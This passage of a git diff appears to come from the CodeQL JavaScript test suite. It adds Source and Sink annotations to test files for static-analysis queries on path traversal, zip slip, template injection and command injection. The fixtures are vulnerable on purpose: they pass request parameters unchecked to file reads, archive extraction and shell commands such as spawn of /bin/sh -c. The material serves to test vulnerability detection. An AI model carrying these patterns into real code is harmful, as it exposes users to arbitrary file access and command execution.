.../CWE-601/ClientSideUrlRedirect/tst15.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 2 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 10 +- .../CWE-601/ServerSideUrlRedirect/koa.js | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 6 +- .../ServerSideUrlRedirect/react-native.js | 2 +- .../Security/CWE-643/XpathInjectionBad.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 2 +- .../test/query-tests/Security/CWE-643/tst2.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 10 +- .../Security/CWE-730/server-crash.js | 24 +- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 2 +- .../test/query-tests/Security/CWE-754/tst.js | 4 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 2 +- .../query-tests/Security/CWE-776/closure.js | 2 +- .../query-tests/Security/CWE-776/domparser.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 2 +- .../test/query-tests/Security/CWE-807/tst.js | 2 +- .../Security/CWE-829/insecure-download.js | 2 +- .../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../test/query-tests/Security/CWE-843/tst.js | 8 +- .../Security/CWE-912/HttpToFileAccess.js | 2 +- .../test/query-tests/Security/CWE-912/tst.js | 2 +- .../PrototypePollutingAssignment/lib.js | 20 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 6 +- .../examples/PrototypePollutingFunction.js | 2 +- .../path-assignment.js | 8 +- .../PrototypePollutingFunction/tests.js | 50 ++-- .../angularmerge.js | 2 +- .../src-vulnerable-lodash/tst.js | 4 +- .../webix/webix.html | 2 +- .../webix/webix.js | 2 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 64 ++--- 211 files changed, 797 insertions(+), 797 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index f2ee8a6dd3c3..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,6 +1,6 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source externalLib(untrusted); // $ Alert externalLib({x: untrusted}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js index 2c915a920b16..573302c33cc5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath-es6.js @@ -4,7 +4,7 @@ import { parse } from 'url'; import { join } from 'path'; var server = createServer(function(req, res) { - let path = parse(req.url, true).query.path; + let path = parse(req.url, true).query.path; // $ Source res.write(readFileSync(join("public", path))); // $ Alert - This could read any file on the file system }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index cc36f38be2dc..ba57e930f03f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system @@ -33,7 +33,7 @@ var server = http.createServer(function(req, res) { path = sanitize(path); res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; + path = url.parse(req.url, true).query.path; // $ Source // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved @@ -70,7 +70,7 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, @@ -106,13 +106,13 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -136,7 +136,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); @@ -181,14 +181,14 @@ var server = http.createServer(function(req, res) { const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source cp.execSync("foobar", {cwd: path}); // $ Alert cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); @@ -197,7 +197,7 @@ var server = http.createServer(function(req, res) { }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index a3e4028b0daa..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -5,7 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 2c251b8de379..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,7 +8,7 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -18,7 +18,7 @@ app.get('/basic', (req, res) => { }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync('./' + path); // $ Alert @@ -28,7 +28,7 @@ app.get('/normalize', (req, res) => { }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; @@ -51,7 +51,7 @@ app.get('/normalize-notAbsolute', (req, res) => { }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; @@ -70,7 +70,7 @@ app.get('/normalize-noInitialDotDot', (req, res) => { app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) fs.readFileSync(path); @@ -79,7 +79,7 @@ app.get('/prepend-normalize', (req, res) => { }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; @@ -91,7 +91,7 @@ app.get('/absolute', (req, res) => { }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; @@ -114,7 +114,7 @@ app.get('/combined-check', (req, res) => { }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source fs.readFileSync(path); // $ Alert fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert @@ -127,7 +127,7 @@ app.get('/realpath', (req, res) => { }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); @@ -136,7 +136,7 @@ app.get('/coerce-relative', (req, res) => { }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) fs.readFileSync(path); @@ -145,7 +145,7 @@ app.get('/coerce-absolute', (req, res) => { }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check @@ -157,7 +157,7 @@ app.get('/concat-after-normalization', (req, res) => { }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; @@ -171,7 +171,7 @@ app.get('/noDotDot', (req, res) => { }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -211,7 +211,7 @@ app.get('/join-regression', (req, res) => { }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) fs.readFileSync(path); @@ -223,7 +223,7 @@ app.get('/decode-after-normalization', (req, res) => { }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { fs.readFileSync(path); // $ Alert @@ -233,7 +233,7 @@ app.get('/replace', (req, res) => { }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -251,7 +251,7 @@ app.get('/resolve-path', (req, res) => { }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -300,7 +300,7 @@ app.get('/relative-startswith', (req, res) => { var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { fs.readFileSync(path); @@ -336,7 +336,7 @@ app.get('/pseudo-normalizations', (req, res) => { }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source fs.readFileSync(path); // $ Alert @@ -351,7 +351,7 @@ app.get('/yet-another-prefix', (req, res) => { var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -374,7 +374,7 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -382,7 +382,7 @@ app.get('/slash-stuff', (req, res) => { }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert @@ -409,7 +409,7 @@ app.get('/join-spread', (req, res) => { }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; fs.readFileSync(path); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 8d2bfe11feb7..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,7 +6,7 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert gracefulFs.readFileSync(path); // $ Alert @@ -35,7 +35,7 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source util.promisify(fs.readFileSync)(path); // $ Alert require("bluebird").promisify(fs.readFileSync)(path); // $ Alert @@ -46,7 +46,7 @@ http.createServer(function(req, res) { const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert asyncFS.readFileSync(path); // $ Alert @@ -65,7 +65,7 @@ http.createServer(function(req, res) { const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert mkdirp(path); // $ Alert @@ -78,7 +78,7 @@ function func(x) { const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index d3ee99d4974b..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,7 +3,7 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; + const { p } = req.params; // $ Source prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 37f8c348a0f6..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,7 +2,7 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index fa19da302606..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index aaa6cfdc2407..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path); // $ Alert @@ -36,7 +36,7 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source nodefs.readFileSync(path); // $ Alert }); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index e18e3c7e8bb1..a21ae5a6f915 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index d705be16b317..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,7 +3,7 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source fs.readFileSync(path.substring(i, j)); fs.readFileSync(path.substring(4)); // $ Alert fs.readFileSync(path.substring(0, i)); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 097bcc1fa117..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index 51549ea75658..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,7 +6,7 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index f16a816b73c4..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -5,7 +5,7 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; @@ -13,14 +13,14 @@ fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - entry.pipe(Writer({path: fileName})); + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { const fileName = entry.path; // $ Alert - var file = fs.openSync(fileName, "w"); + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); @@ -28,11 +28,11 @@ const zip = new JSZip(); const path = require('path'); function doZipSlip() { for (const name in zip.files) { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink } zip.forEach((name, file) => { // $ Alert - fs.createWriteStream(name); + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index 6960ac4eeae1..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js @@ -3,6 +3,6 @@ var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { var fileName = 'output/path/' + entry.path; // $ Alert - fs.writeFileSync(fileName, entry.contents); + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 2ba62e67480d..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -5,5 +5,5 @@ fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { var fileName = entry.path; // $ Alert - entry.pipe(fs.createWriteStream(fileName)); + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index 8b6c30c46947..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -4,8 +4,8 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source res.render('template', bodyParameter); // $ Alert res.render('template', queryParameter); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 8f8b075010bf..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -3,7 +3,7 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -23,7 +23,7 @@ app3.post('/path', require('body-parser').json(), function(req, res) { var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -31,7 +31,7 @@ var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -39,7 +39,7 @@ var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; + var bodyParameter = req.body.bodyParameter; // $ Source res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 3f50d6d5df66..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,7 +5,7 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; + const title = github.context.payload.pull_request.title; // $ Source exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; @@ -15,7 +15,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; + const head_ref = github.context.payload.pull_request.head.ref; // $ Source aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index ed1c9041a8ea..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,7 +3,7 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source cp.exec("foo"); cp.execSync("foo"); @@ -36,25 +36,25 @@ var server = http.createServer(function(req, res) { sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // $ Alert + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile("/bin/bash", args); // $ Alert args = []; args[0] = "-c"; - args[1] = cmd; + args[1] = cmd; // $ Sink run("sh", args); args = []; args[0] = `-` + "c"; - args[1] = cmd; + args[1] = cmd; // $ Sink cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink let myArgs = []; myArgs.push(`-` + "c"); @@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) { }); -function run(cmd, args) { +function run(cmd, args) { // $ Sink cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source util.promisify(cp.exec)(cmd); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b2cfe4424039..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ 